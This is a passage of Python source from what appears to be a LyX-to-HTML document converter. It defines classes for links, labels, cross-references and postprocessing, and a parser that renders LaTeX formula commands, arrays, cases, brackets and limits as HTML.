    return None
class VerticalSpace(Container):
  "An inset that contains a vertical space."
  def __init__(self):
    self.parser = InsetParser()
    self.output = FixedOutput()
  def process(self):
    "Set the correct tag; unknown types are taken as literal CSS heights."
    self.type = self.header[2]
    if self.type in StyleConfig.vspaces:
      self.html = [StyleConfig.vspaces[self.type]]
      return
    self.output = TaggedOutput().settag('div class="vspace" style="height: ' + self.type + ';"', True)
class Align(Container):
  "Bit of aligned text"
  def __init__(self):
    self.parser = ExcludingParser()
    self.output = TaggedOutput().setbreaklines(True)
  def process(self):
    "Wrap the contents in a div named after the alignment."
    self.output.tag = 'div class="' + self.header[1] + '"'
class Newline(Container):
  "A newline"
  def __init__(self):
    self.parser = LoneCommand()
    self.output = FixedOutput()
  def process(self):
    "Emit a line break."
    self.html = ['<br/>\n']
class NewPage(Newline):
  "A new page"
  def process(self):
    "Emit a paragraph break standing in for the page break."
    self.html = ['<p><br/>\n</p>\n']
class Separator(Container):
  "A separator string which is not extracted by extracttext()."
  def __init__(self, constant):
    "Output the given constant as fixed HTML, with no child contents."
    self.output = FixedOutput()
    self.contents = []
    self.html = [constant]
class StrikeOut(TaggedText):
  "Striken out text."
  def process(self):
    "Render the text struck through."
    self.output.tag = 'strike'
class StartAppendix(BlackBox):
  "Mark to start an appendix here."
  "From this point on, all chapters become appendices."
  def process(self):
    "Switch the numbering scheme to appendix letters."
    NumberGenerator.generator.startappendix()
class Link(Container):
  "A link to another part of the document"
  anchor = None
  url = None
  type = None
  page = None
  target = None
  destination = None
  title = None
  def __init__(self):
    "Initialize the link, add target if configured."
    self.contents = []
    self.parser = InsetParser()
    self.output = LinkOutput()
    if Options.target:
      self.target = Options.target
  def complete(self, text, anchor = None, url = None, type = None, title = None):
    "Fill in the link text and any attributes that were supplied."
    self.contents = [Constant(text)]
    for name, value in (('anchor', anchor), ('url', url), ('type', type), ('title', title)):
      if value:
        setattr(self, name, value)
    return self
  def computedestination(self):
    "Use the destination link to fill in the destination URL."
    if not self.destination:
      return
    self.url = ''
    if self.destination.anchor:
      self.url = '#' + self.destination.anchor
    if self.destination.page:
      self.url = self.destination.page + self.url
  def setmutualdestination(self, destination):
    "Set another link as destination, and set its destination to this one."
    self.destination = destination
    destination.destination = self
  def __unicode__(self):
    "Return a printable representation."
    result = 'Link'
    if self.anchor:
      result += ' #' + self.anchor
    if self.url:
      result += ' to ' + self.url
    return result
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class URL(Link):
  "A clickable URL"
  def process(self):
    "Read the URL from the inset parameters."
    target = self.escape(self.getparameter('target'))
    type = self.getparameter('type')
    if type:
      self.url = self.escape(type) + target
    else:
      self.url = target
    name = self.getparameter('name')
    self.contents = [Constant(name if name else target)]
class FlexURL(URL):
  "A flexible URL"
  def process(self):
    "Read the URL from the inset contents."
    self.url = self.extracttext()
class LinkOutput(ContainerOutput):
  "A link pointing to some destination"
  "Or an anchor (destination)"
  def gethtml(self, link):
    "Get the HTML code for the link"
    linktype = link.type or link.__class__.__name__
    tag = 'a class="' + linktype + '"'
    if link.anchor:
      tag += ' name="' + link.anchor + '"'
    if link.destination:
      # fill in link.url from the destination before reading it below
      link.computedestination()
    if link.url:
      tag += ' href="' + link.url + '"'
    if link.target:
      tag += ' target="' + link.target + '"'
    if link.title:
      tag += ' title="' + link.title + '"'
    return TaggedOutput().settag(tag).gethtml(link)
class Postprocessor(object):
  "Postprocess a container keeping some context"
  # stage classes register themselves in this class-level list
  stages = []
  def __init__(self):
    # instance attribute shadows the class list with a class->stage lookup
    self.stages = StageDict(Postprocessor.stages, self)
    self.current = None
    self.last = None
  def postprocess(self, next):
    "Postprocess a container and its contents."
    # one-element pipeline: each call pushes `next` in and releases the
    # postprocessed previous element
    self.postrecursive(self.current)
    result = self.postcurrent(next)
    self.last = self.current
    self.current = next
    return result
  def postrecursive(self, container):
    "Postprocess the container contents recursively"
    if not hasattr(container, 'contents'):
      return
    if len(container.contents) == 0:
      return
    # a container may opt out by setting postprocess to a false value
    if hasattr(container, 'postprocess'):
      if not container.postprocess:
        return
    postprocessor = Postprocessor()
    contents = []
    for element in container.contents:
      post = postprocessor.postprocess(element)
      if post:
        contents.append(post)
    # two rounds to empty the pipeline
    for i in range(2):
      post = postprocessor.postprocess(None)
      if post:
        contents.append(post)
    container.contents = contents
  def postcurrent(self, next):
    "Postprocess the current element taking into account next and last."
    stage = self.stages.getstage(self.current)
    if not stage:
      return self.current
    return stage.postprocess(self.last, self.current, next)
class StageDict(object):
  "A dictionary of stages corresponding to classes"
  def __init__(self, classes, postprocessor):
    "Instantiate one stage per class and key them by processed class."
    instances = self.instantiate(classes, postprocessor)
    self.stagedict = dict([(x.processedclass, x) for x in instances])
  def instantiate(self, classes, postprocessor):
    "Instantiate a stage from each class and bind it to the postprocessor."
    stages = [stageclass.__new__(stageclass) for stageclass in classes]
    for stage in stages:
      stage.__init__()
      stage.postprocessor = postprocessor
    return stages
  def getstage(self, element):
    "Get the stage for a given element, if its type is in the dict."
    return self.stagedict.get(element.__class__, None)
class Label(Link):
  "A label to be referenced"
  names = dict()
  lastlayout = None
  def __init__(self):
    Link.__init__(self)
    self.lastnumbered = None
  def process(self):
    "Process a label container."
    key = self.getparameter('name')
    self.create(' ', key)
    self.lastnumbered = Label.lastlayout
  def create(self, text, key, type = 'Label'):
    "Create the label for a given key and resolve any pending references."
    self.key = key
    self.complete(text, anchor = key, type = type)
    Label.names[key] = self
    if key in Reference.references:
      for pending in Reference.references[key]:
        pending.destination = self
    return self
  def findpartkey(self):
    "Get the part key for the latest numbered container seen."
    numbered = self.numbered(self)
    if numbered and numbered.partkey:
      return numbered.partkey
    return ''
  def numbered(self, container):
    "Get the numbered container for the label."
    if container.partkey:
      return container
    if container.parent:
      return self.numbered(container.parent)
    # reached the root without a part key: use the last numbered layout
    if self.lastnumbered:
      return self.lastnumbered
    return None
  def __unicode__(self):
    "Return a printable representation."
    if not hasattr(self, 'key'):
      return 'Unnamed label'
    return 'Label ' + self.key
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class Reference(Link):
  "A reference to a label."
  # key -> list of references, so labels defined later can resolve them
  references = dict()
  key = 'none'
  def process(self):
    "Read the reference and set the arrow."
    self.key = self.getparameter('reference')
    if self.key in Label.names:
      # backward reference: the label was already seen above
      self.direction = u'↑'
      label = Label.names[self.key]
    else:
      # forward reference: create a placeholder label, resolved later
      self.direction = u'↓'
      label = Label().complete(' ', self.key, 'preref')
    self.destination = label
    self.formatcontents()
    if not self.key in Reference.references:
      Reference.references[self.key] = []
    Reference.references[self.key].append(self)
  def formatcontents(self):
    "Format the reference contents."
    formatkey = self.getparameter('LatexCommand')
    if not formatkey:
      formatkey = 'ref'
    self.formatted = u'↕'
    if formatkey in StyleConfig.referenceformats:
      self.formatted = StyleConfig.referenceformats[formatkey]
    else:
      Trace.error('Unknown reference format ' + formatkey)
    # substitute the template placeholders one by one
    self.replace(u'↕', self.direction)
    self.replace('#', '1')
    self.replace('on-page', Translator.translate('on-page'))
    partkey = self.destination.findpartkey()
    # only if partkey and partkey.number are not null, send partkey.number
    self.replace('@', partkey and partkey.number)
    self.replace(u'¶', partkey and partkey.tocentry)
    if not '$' in self.formatted or not partkey or not partkey.titlecontents:
      # there is a $ left, but it should go away on preprocessing
      self.contents = [Constant(self.formatted)]
      return
    # expand each '$' into the title contents of the referenced part
    pieces = self.formatted.split('$')
    self.contents = [Constant(pieces[0])]
    for piece in pieces[1:]:
      self.contents += partkey.titlecontents
      self.contents.append(Constant(piece))
  def replace(self, key, value):
    "Replace a key in the format template with a value."
    if not key in self.formatted:
      return
    if not value:
      value = ''
    self.formatted = self.formatted.replace(key, value)
  def __unicode__(self):
    "Return a printable representation."
    return 'Reference ' + self.key
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class FormulaCommand(FormulaBit):
  "A LaTeX command inside a formula"
  types = []
  start = FormulaConfig.starts['command']
  commandmap = None
  def detect(self, pos):
    "Find the current command."
    return pos.checkfor(FormulaCommand.start)
  def parsebit(self, pos):
    "Parse the command."
    command = self.extractcommand(pos)
    bit = self.parsewithcommand(command, pos)
    if bit:
      return bit
    # try the \up / \Up variants of the Greek letters
    if command.startswith('\\up') or command.startswith('\\Up'):
      upgreek = self.parseupgreek(command, pos)
      if upgreek:
        return upgreek
    if not self.factory.defining:
      Trace.error('Unknown command ' + command)
    self.output = TaggedOutput().settag('span class="unknown"')
    self.add(FormulaConstant(command))
    return None
  def parsewithcommand(self, command, pos):
    "Parse the command type once we have the command."
    for type in FormulaCommand.types:
      if command in type.commandmap:
        return self.parsecommandtype(command, type, pos)
    return None
  def parsecommandtype(self, command, type, pos):
    "Parse a given command type."
    bit = self.factory.create(type)
    bit.setcommand(command)
    returned = bit.parsebit(pos)
    if returned:
      return returned
    return bit
  def extractcommand(self, pos):
    "Extract the command from the current position."
    if not pos.checkskip(FormulaCommand.start):
      pos.error('Missing command start ' + FormulaCommand.start)
      return
    if pos.finished():
      return self.emptycommand(pos)
    if pos.current().isalpha():
      # alpha command
      command = FormulaCommand.start + pos.globalpha()
      # skip mark of short command
      pos.checkskip('*')
      return command
    # symbol command
    return FormulaCommand.start + pos.skipcurrent()
  def emptycommand(self, pos):
    """Check for an empty command: look for command disguised as ending.
    Special case against '{ \\{ \\} }' situation."""
    command = ''
    if not pos.isout():
      ending = pos.nextending()
      if ending and pos.checkskip(ending):
        command = ending
    return FormulaCommand.start + command
  def parseupgreek(self, command, pos):
    "Parse the Greek \\up command."
    if len(command) < 4:
      return None
    if command.startswith('\\up'):
      upcommand = '\\' + command[3:]
    elif command.startswith('\\Up'):
      # was pos.checkskip('\\Up'), which tested (and consumed from) the
      # parse position instead of the command, so \Up... never matched
      upcommand = '\\' + command[3:4].upper() + command[4:]
    else:
      Trace.error('Impossible upgreek command: ' + command)
      return
    upgreek = self.parsewithcommand(upcommand, pos)
    if upgreek:
      upgreek.type = 'font'
    return upgreek
class CommandBit(FormulaCommand):
  "A formula bit that includes a command"
  def setcommand(self, command):
    "Set the command in the bit"
    self.command = command
    if self.commandmap:
      # keep the original TeX for round-tripping; store the translation
      self.original += command
      self.translated = self.commandmap[self.command]
  def parseparameter(self, pos):
    "Parse a parameter at the current position"
    self.factory.clearskipped(pos)
    if pos.finished():
      return None
    parameter = self.factory.parseany(pos)
    self.add(parameter)
    return parameter
  def parsesquare(self, pos):
    "Parse a square bracket"
    self.factory.clearskipped(pos)
    if not self.factory.detecttype(SquareBracket, pos):
      return None
    bracket = self.factory.parsetype(SquareBracket, pos)
    self.add(bracket)
    return bracket
  def parseliteral(self, pos):
    "Parse a literal bracket."
    self.factory.clearskipped(pos)
    if not self.factory.detecttype(Bracket, pos):
      # no opening brace: fall back to a bare value token, if any
      if not pos.isvalue():
        Trace.error('No literal parameter found at: ' + pos.identifier())
        return None
      return pos.globvalue()
    bracket = Bracket().setfactory(self.factory)
    self.add(bracket.parseliteral(pos))
    return bracket.literal
  def parsesquareliteral(self, pos):
    "Parse a square bracket literally."
    self.factory.clearskipped(pos)
    if not self.factory.detecttype(SquareBracket, pos):
      return None
    bracket = SquareBracket().setfactory(self.factory)
    self.add(bracket.parseliteral(pos))
    return bracket.literal
  def parsetext(self, pos):
    "Parse a text parameter."
    self.factory.clearskipped(pos)
    if not self.factory.detecttype(Bracket, pos):
      Trace.error('No text parameter for ' + self.command)
      return None
    bracket = Bracket().setfactory(self.factory).parsetext(pos)
    self.add(bracket)
    return bracket
class EmptyCommand(CommandBit):
  "An empty command (without parameters)"
  commandmap = FormulaConfig.commands
  def parsebit(self, pos):
    "Parse a command without parameters: output is just the translated constant."
    self.contents = [FormulaConstant(self.translated)]
class SpacedCommand(CommandBit):
  "An empty command which should have math spacing in formulas."
  commandmap = FormulaConfig.spacedcommands
  def parsebit(self, pos):
    "Place as contents the command translated, surrounded by single spaces."
    self.contents = [FormulaConstant(u' ' + self.translated + u' ')]
class AlphaCommand(EmptyCommand):
  "A command without parameters whose result is alphabetical."
  commandmap = FormulaConfig.alphacommands
  def parsebit(self, pos):
    "Parse the command exactly like EmptyCommand, then set type to alpha."
    EmptyCommand.parsebit(self, pos)
    self.type = 'alpha'
class OneParamFunction(CommandBit):
  "A function of one parameter"
  commandmap = FormulaConfig.onefunctions
  # whether the function has been reduced to a single fixed character
  simplified = False
  def parsebit(self, pos):
    "Parse a function with one parameter"
    self.output = TaggedOutput().settag(self.translated)
    self.parseparameter(pos)
    self.simplifyifpossible()
  def simplifyifpossible(self):
    "Try to simplify to a single character."
    if self.original in self.commandmap:
      # the complete original text maps directly to one output character
      self.output = FixedOutput()
      self.html = [self.commandmap[self.original]]
      self.simplified = True
class SymbolFunction(CommandBit):
  "Find a function which is represented by a symbol (like _ or ^)"
  commandmap = FormulaConfig.symbolfunctions
  def detect(self, pos):
    "Check if the current character is a known symbol function."
    return pos.current() in SymbolFunction.commandmap
  def parsebit(self, pos):
    "Parse the symbol and the single parameter it applies to."
    self.setcommand(pos.current())
    pos.skip(self.command)
    self.output = TaggedOutput().settag(self.translated)
    self.parseparameter(pos)
class TextFunction(CommandBit):
  "A function where parameters are read as text."
  commandmap = FormulaConfig.textfunctions
  def parsebit(self, pos):
    "Parse a single text parameter."
    self.output = TaggedOutput().settag(self.translated)
    self.parsetext(pos)
  def process(self):
    "Set the type to font"
    self.type = 'font'
class LabelFunction(CommandBit):
  "A function that acts as a label"
  commandmap = FormulaConfig.labelfunctions
  def parsebit(self, pos):
    "Parse a literal parameter and keep it as the label key."
    self.key = self.parseliteral(pos)
  def process(self):
    "Add an anchor with the label contents."
    self.type = 'font'
    self.label = Label().create(' ', self.key, type = 'eqnumber')
    self.contents = [self.label]
    # store as a Label so we know it's been seen
    Label.names[self.key] = self.label
class FontFunction(OneParamFunction):
  "A function of one parameter that changes the font"
  commandmap = FormulaConfig.fontfunctions
  def process(self):
    "Set the type to font and simplify if possible using a single character."
    self.type = 'font'
    self.simplifyifpossible()
# register the parsers: factory-level bit types first, then the specific
# command bit classes that FormulaCommand tries in this order
FormulaFactory.types += [FormulaCommand, SymbolFunction]
FormulaCommand.types = [
    AlphaCommand, EmptyCommand, OneParamFunction, FontFunction, LabelFunction,
    TextFunction, SpacedCommand,
    ]
class BigSymbol(object):
  "A big symbol generator."
  symbols = FormulaConfig.bigsymbols
  def __init__(self, symbol):
    "Remember the symbol to generate."
    self.symbol = symbol
  def getpieces(self):
    "Return the list of pieces that make up the symbol."
    if self.symbol not in self.symbols or self.smalllimit():
      # unknown symbol, or a context where the one-line form suffices
      return [self.symbol]
    return self.symbols[self.symbol]
  def smalllimit(self):
    "Decide if the limit should be a small, one-line symbol."
    if not DocumentParameters.displaymode:
      return True
    pieces = self.symbols[self.symbol]
    if len(pieces) == 1:
      return True
    return Options.simplemath
class BigBracket(BigSymbol):
  "A big bracket generator."
  def __init__(self, size, bracket, alignment='l'):
    "Set the size (in rows) and symbol for the bracket."
    self.size = size
    self.original = bracket
    self.alignment = alignment
    self.pieces = None
    if bracket in FormulaConfig.bigbrackets:
      self.pieces = FormulaConfig.bigbrackets[bracket]
  def getpiece(self, index):
    "Return the nth piece for the bracket."
    # dispatch on the number of configured pieces: getpiece1, getpiece3, getpiece4
    function = getattr(self, 'getpiece' + unicode(len(self.pieces)))
    return function(index)
  def getpiece1(self, index):
    "Return the only piece for a single-piece bracket."
    return self.pieces[0]
  def getpiece3(self, index):
    "Get the nth piece for a 3-piece bracket: parenthesis or square bracket."
    if index == 0:
      return self.pieces[0]
    if index == self.size - 1:
      return self.pieces[-1]
    return self.pieces[1]
  def getpiece4(self, index):
    "Get the nth piece for a 4-piece bracket: curly bracket."
    if index == 0:
      return self.pieces[0]
    if index == self.size - 1:
      return self.pieces[3]
    if index == (self.size - 1)/2:
      # the hook piece goes at the vertical middle row
      return self.pieces[2]
    return self.pieces[1]
  def getcell(self, index):
    "Get the bracket piece as an array cell."
    piece = self.getpiece(index)
    span = 'span class="bracket align-' + self.alignment + '"'
    return TaggedBit().constant(piece, span)
  def getcontents(self):
    "Get the bracket as an array or as a single bracket."
    if self.size == 1 or not self.pieces:
      return self.getsinglebracket()
    rows = []
    for index in range(self.size):
      cell = self.getcell(index)
      rows.append(TaggedBit().complete([cell], 'span class="arrayrow"'))
    return [TaggedBit().complete(rows, 'span class="array"')]
  def getsinglebracket(self):
    "Return the bracket as a single sign."
    if self.original == '.':
      # '.' denotes an invisible (empty) bracket in TeX
      return [TaggedBit().constant('', 'span class="emptydot"')]
    return [TaggedBit().constant(self.original, 'span class="symbol"')]
class FormulaEquation(CommandBit):
  "A simple numbered equation."
  piece = 'equation'
  def parsebit(self, pos):
    "Parse the equation contents as one whole formula."
    self.output = ContentsOutput()
    self.add(self.factory.parsetype(WholeFormula, pos))
class FormulaCell(FormulaCommand):
  "An array cell inside a row"
  def setalignment(self, alignment):
    "Set the horizontal alignment ('l', 'c' or 'r') and the output tag; fluent."
    self.alignment = alignment
    self.output = TaggedOutput().settag('span class="arraycell align-' + alignment +'"', True)
    return self
  def parsebit(self, pos):
    "Parse the cell contents as a whole formula; an empty cell stays empty."
    self.factory.clearskipped(pos)
    if pos.finished():
      return
    self.add(self.factory.parsetype(WholeFormula, pos))
class FormulaRow(FormulaCommand):
  "An array row inside an array"
  cellseparator = FormulaConfig.array['cellseparator']
  def setalignments(self, alignments):
    "Set the per-column alignments and the output tag; fluent."
    self.alignments = alignments
    self.output = TaggedOutput().settag('span class="arrayrow"', True)
    return self
  def parsebit(self, pos):
    "Parse a whole row"
    index = 0
    # the cell separator ending is optional: the last cell has no separator
    pos.pushending(self.cellseparator, optional=True)
    while not pos.finished():
      cell = self.createcell(index)
      cell.parsebit(pos)
      self.add(cell)
      index += 1
      pos.checkskip(self.cellseparator)
    if len(self.contents) == 0:
      # a completely empty row produces no output at all
      self.output = EmptyOutput()
  def createcell(self, index):
    "Create the cell that corresponds to the given index."
    # alignments repeat cyclically when there are more cells than alignments
    alignment = self.alignments[index % len(self.alignments)]
    return self.factory.create(FormulaCell).setalignment(alignment)
class MultiRowFormula(CommandBit):
  "A formula with multiple rows."
  def parserows(self, pos):
    "Parse all rows, finish when no more row ends"
    self.rows = []
    first = True
    for row in self.iteraterows(pos):
      if first:
        first = False
      else:
        # intersparse empty rows
        self.addempty()
      row.parsebit(pos)
      self.addrow(row)
    self.size = len(self.rows)
  def iteraterows(self, pos):
    "Iterate over all rows, end when no more row ends"
    rowseparator = FormulaConfig.array['rowseparator']
    while True:
      # the row separator ending is optional: the last row has none
      pos.pushending(rowseparator, True)
      row = self.factory.create(FormulaRow)
      yield row.setalignments(self.alignments)
      if pos.checkfor(rowseparator):
        self.original += pos.popending(rowseparator)
      else:
        return
  def addempty(self):
    "Add an empty row with as many blank cells as the previous row."
    row = self.factory.create(FormulaRow).setalignments(self.alignments)
    # one blank cell per cell in the previous row (the loop variable
    # originally bound each cell too, but it was never used)
    for index in range(len(self.rows[-1].contents)):
      cell = row.createcell(index)
      cell.add(FormulaConstant(u' '))
      row.add(cell)
    self.addrow(row)
  def addrow(self, row):
    "Add a row to the contents and to the list of rows."
    self.rows.append(row)
    self.add(row)
class FormulaArray(MultiRowFormula):
  "An array within a formula"
  piece = 'array'
  def parsebit(self, pos):
    "Parse the array: alignments first, then all rows."
    self.output = TaggedOutput().settag('span class="array"', False)
    self.parsealignments(pos)
    self.parserows(pos)
  def parsealignments(self, pos):
    "Parse the vertical and horizontal alignments."
    # vertical: optional square-bracket parameter, default centered
    self.valign = 'c'
    literal = self.parsesquareliteral(pos)
    if literal:
      self.valign = literal
    # horizontal: one alignment character per column, e.g. {lcr};
    # list() over the literal string replaces the manual append loop
    self.alignments = list(self.parseliteral(pos))
class FormulaMatrix(MultiRowFormula):
  "A matrix (array with center alignment)."
  piece = 'matrix'
  def parsebit(self, pos):
    "Parse the matrix, set alignments to 'c'."
    self.output = TaggedOutput().settag('span class="array"', False)
    self.valign = 'c'
    self.alignments = ['c']
    self.parserows(pos)
class FormulaCases(MultiRowFormula):
  "A cases statement"
  piece = 'cases'
  def parsebit(self, pos):
    "Parse the cases"
    self.output = ContentsOutput()
    self.alignments = ['l', 'l']
    self.parserows(pos)
    # retag every parsed cell and pad it with a space
    for row in self.contents:
      for cell in row.contents:
        cell.output.settag('span class="case align-l"', True)
        cell.contents.append(FormulaConstant(u' '))
    # wrap all rows in one span, preceded by a big left curly brace
    array = TaggedBit().complete(self.contents, 'span class="bracketcases"', True)
    brace = BigBracket(len(self.contents), '{', 'l')
    self.contents = brace.getcontents() + [array]
class EquationEnvironment(MultiRowFormula):
  "A \\begin{}...\\end equation environment with rows and cells."
  def parsebit(self, pos):
    "Parse the whole environment."
    self.output = TaggedOutput().settag('span class="environment"', False)
    # starred variants (e.g. align*) share the base environment's alignments
    environment = self.piece.replace('*', '')
    if environment in FormulaConfig.environments:
      self.alignments = FormulaConfig.environments[environment]
    else:
      Trace.error('Unknown equation environment ' + self.piece)
      self.alignments = ['l']
    self.parserows(pos)
class BeginCommand(CommandBit):
  "A \\begin{}...\\end command and what it entails (array, cases, aligned)"
  commandmap = {FormulaConfig.array['begin']:''}
  # concrete environments tried before the generic EquationEnvironment
  types = [FormulaEquation, FormulaArray, FormulaCases, FormulaMatrix]
  def parsebit(self, pos):
    "Parse the begin command"
    command = self.parseliteral(pos)
    bit = self.findbit(command)
    # parse until the matching \end{command}
    ending = FormulaConfig.array['end'] + '{' + command + '}'
    pos.pushending(ending)
    bit.parsebit(pos)
    self.add(bit)
    self.original += pos.popending(ending)
    self.size = bit.size
  def findbit(self, piece):
    "Find the command bit corresponding to the \\begin{piece}"
    # starred environments map to the same bit as their base name
    for type in BeginCommand.types:
      if piece.replace('*', '') == type.piece:
        return self.factory.create(type)
    # unknown name: fall back to a generic equation environment
    bit = self.factory.create(EquationEnvironment)
    bit.piece = piece
    return bit
FormulaCommand.types += [BeginCommand]
class CombiningFunction(OneParamFunction):
  "A function that appends a combining character to a one-character parameter."
  commandmap = FormulaConfig.combiningfunctions
  def parsebit(self, pos):
    "Parse a combining function."
    self.type = 'alpha'
    combining = self.translated
    parameter = self.parsesingleparameter(pos)
    if not parameter:
      Trace.error('Empty parameter for combining function ' + self.command)
    elif len(parameter.extracttext()) != 1:
      Trace.error('Applying combining function ' + self.command + ' to invalid string "' + parameter.extracttext() + '"')
    # the combining character goes after its base character
    self.contents.append(Constant(combining))
  def parsesingleparameter(self, pos):
    "Parse a parameter, or a single letter."
    self.factory.clearskipped(pos)
    if pos.finished():
      Trace.error('Error while parsing single parameter at ' + pos.identifier())
      return None
    if self.factory.detecttype(Bracket, pos) \
    or self.factory.detecttype(FormulaCommand, pos):
      return self.parseparameter(pos)
    # bare letter: wrap it in a constant bit
    letter = FormulaConstant(pos.skipcurrent())
    self.add(letter)
    return letter
class DecoratingFunction(OneParamFunction):
  "A function that decorates some bit of text"
  commandmap = FormulaConfig.decoratingfunctions
  def parsebit(self, pos):
    "Parse a decorating function"
    self.type = 'alpha'
    symbol = self.translated
    self.symbol = TaggedBit().constant(symbol, 'span class="symbolover"')
    # NOTE(review): parseparameter can return None when the position is
    # finished; the lines below assume a parameter was found -- confirm
    self.parameter = self.parseparameter(pos)
    self.output = TaggedOutput().settag('span class="withsymbol"')
    # the decorating symbol is rendered above, the parameter below it
    self.contents.insert(0, self.symbol)
    self.parameter.output = TaggedOutput().settag('span class="undersymbol"')
    self.simplifyifpossible()
class LimitCommand(EmptyCommand):
  "A command which accepts limits above and below, in display mode."
  commandmap = FormulaConfig.limitcommands
  def parsebit(self, pos):
    "Parse a limit command."
    # the big symbol may expand to several stacked pieces
    pieces = BigSymbol(self.translated).getpieces()
    self.output = TaggedOutput().settag('span class="limits"')
    for piece in pieces:
      self.contents.append(TaggedBit().constant(piece, 'span class="limit"'))
class LimitPreviousCommand(LimitCommand):
  "A command to limit the previous command."
  # no commandmap: this bit is not triggered by a command name
  commandmap = None
  def parsebit(self, pos):
    "Do nothing; LimitsProcessor applies the limits to the previous element."
    self.output = TaggedOutput().settag('span class="limits"')
    self.factory.clearskipped(pos)
  def __unicode__(self):
    "Return a printable representation."
    return 'Limit previous command'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class LimitsProcessor(MathsProcessor):
  "A processor for limits inside an element."
  def process(self, contents, index):
    "Process the limits for an element."
    if Options.simplemath:
      return
    if self.checklimits(contents, index):
      self.modifylimits(contents, index)
    # two consecutive scripts (sub then super) get stacked vertically
    if self.checkscript(contents, index) and self.checkscript(contents, index + 1):
      self.modifyscripts(contents, index)
  def checklimits(self, contents, index):
    "Check if the current position has a limits command."
    if not DocumentParameters.displaymode:
      return False
    if self.checkcommand(contents, index + 1, LimitPreviousCommand):
      self.limitsahead(contents, index)
      return False
    if not isinstance(contents[index], LimitCommand):
      return False
    return self.checkscript(contents, index + 1)
  def limitsahead(self, contents, index):
    "Limit the current element based on the next."
    contents[index + 1].add(contents[index].clone())
    contents[index].output = EmptyOutput()
  def modifylimits(self, contents, index):
    "Modify a limits commands so that the limits appear above and below."
    limited = contents[index]
    subscript = self.getlimit(contents, index + 1)
    limited.contents.append(subscript)
    if self.checkscript(contents, index + 1):
      superscript = self.getlimit(contents, index + 1)
    else:
      # no explicit superscript: insert a blank one to keep the layout
      superscript = TaggedBit().constant(u' ', 'sup class="limit"')
    limited.contents.insert(0, superscript)
  def getlimit(self, contents, index):
    "Get the limit for a limits command."
    limit = self.getscript(contents, index)
    limit.output.tag = limit.output.tag.replace('script', 'limit')
    return limit
  def modifyscripts(self, contents, index):
    "Modify the super- and subscript to appear vertically aligned."
    subscript = self.getscript(contents, index)
    # subscript removed so instead of index + 1 we get index again
    superscript = self.getscript(contents, index)
    scripts = TaggedBit().complete([superscript, subscript], 'span class="scripts"')
    contents.insert(index, scripts)
  def checkscript(self, contents, index):
    "Check if the current element is a sub- or superscript."
    return self.checkcommand(contents, index, SymbolFunction)
  def checkcommand(self, contents, index, type):
    "Check for the given type as the current element."
    if len(contents) <= index:
      return False
    return isinstance(contents[index], type)
  def getscript(self, contents, index):
    "Get the sub- or superscript, removing it from the contents."
    bit = contents[index]
    bit.output.tag += ' class="script"'
    del contents[index]
    return bit
class BracketCommand(OneParamFunction):
  "A command which defines a bracket."
  commandmap = FormulaConfig.bracketcommands
  def parsebit(self, pos):
    "Parse the bracket as a regular one-parameter function."
    OneParamFunction.parsebit(self, pos)
  def create(self, direction, character):
    "Create the bracket for the given character and direction; fluent."
    self.original = character
    self.command = '\\' + direction
    self.contents = [FormulaConstant(character)]
    return self
class BracketProcessor(MathsProcessor):
  "A processor for bracket commands."
  def process(self, contents, index):
    "Convert the bracket using Unicode pieces, if possible."
    if Options.simplemath:
      return
    if self.checkleft(contents, index):
      return self.processleft(contents, index)
  def processleft(self, contents, index):
    "Process a left bracket."
    rightindex = self.findright(contents, index + 1)
    if not rightindex:
      return
    # resize both brackets to the tallest element between them
    size = self.findmax(contents, index, rightindex)
    self.resize(contents[index], size)
    self.resize(contents[rightindex], size)
  def checkleft(self, contents, index):
    "Check if the command at the given index is left."
    return self.checkdirection(contents[index], '\\left')
  def checkright(self, contents, index):
    "Check if the command at the given index is right."
    return self.checkdirection(contents[index], '\\right')
  def checkdirection(self, bit, command):
    "Check if the given bit is the desired bracket command."
    if not isinstance(bit, BracketCommand):
      return False
    return bit.command == command
  def findright(self, contents, index):
    "Find the matching right bracket starting at the given index, or None."
    # depth tracks nested \left...\right pairs
    depth = 1
    while index < len(contents):
      if self.checkleft(contents, index):
        depth += 1
      if self.checkright(contents, index):
        depth -= 1
        if depth == 0:
          return index
      index += 1
    return None
  def findmax(self, contents, leftindex, rightindex):
    "Find the max size of the contents between the two given indices."
    sliced = contents[leftindex:rightindex]
    return max([element.size for element in sliced])
  def resize(self, command, size):
    "Resize a bracket command to the given size."
    character = command.extracttext()
    alignment = command.command.replace('\\', '')
    bracket = BigBracket(size, character, alignment)
    command.output = ContentsOutput()
    command.contents = bracket.getcontents()
class TodayCommand(EmptyCommand):
  "Shows today's date."
  commandmap = None
  def parsebit(self, pos):
    "Render the current date as fixed HTML output."
    self.output = FixedOutput()
    formatted = datetime.date.today().strftime('%b %d, %Y')
    self.html = [formatted]
# register the decoration/limit/bracket commands and their post-processors
FormulaCommand.types += [
    DecoratingFunction, CombiningFunction, LimitCommand, BracketCommand,
    ]
FormulaProcessor.processors += [
    LimitsProcessor(), BracketProcessor(),
    ]
class ParameterDefinition(object):
  """The definition of a parameter in a hybrid function.
  [] parameters are optional, {} parameters are mandatory.
  Each parameter has a one-character name, like {$1} or {$p}.
  A parameter that ends in ! like {$p!} is a literal.
  Example: [$1]{$p!} reads an optional parameter $1 and a literal mandatory parameter p.
  (The original class held these lines as separate bare string statements;
  only the first string literal is the docstring, so they were dead code.)
  """
  parambrackets = [('[', ']'), ('{', '}')]
  def __init__(self):
    "Start with an unnamed, mandatory, non-literal, empty parameter."
    self.name = None
    self.literal = False
    self.optional = False
    self.value = None
    self.literalvalue = None
  def parse(self, pos):
    "Parse a parameter definition: [$0], {$x}, {$1!}...; returns self or None."
    for (opening, closing) in ParameterDefinition.parambrackets:
      if pos.checkskip(opening):
        if opening == '[':
          self.optional = True
        if not pos.checkskip('$'):
          Trace.error('Wrong parameter name, did you mean $' + pos.current() + '?')
          return None
        self.name = pos.skipcurrent()
        if pos.checkskip('!'):
          self.literal = True
        if not pos.checkskip(closing):
          Trace.error('Wrong parameter closing ' + pos.skipcurrent())
          return None
        return self
    Trace.error('Wrong character in parameter template: ' + pos.skipcurrent())
    return None
  def read(self, pos, function):
    "Read the parameter itself using the definition."
    if self.literal:
      # literal parameters keep the raw text and wrap it in a constant
      if self.optional:
        self.literalvalue = function.parsesquareliteral(pos)
      else:
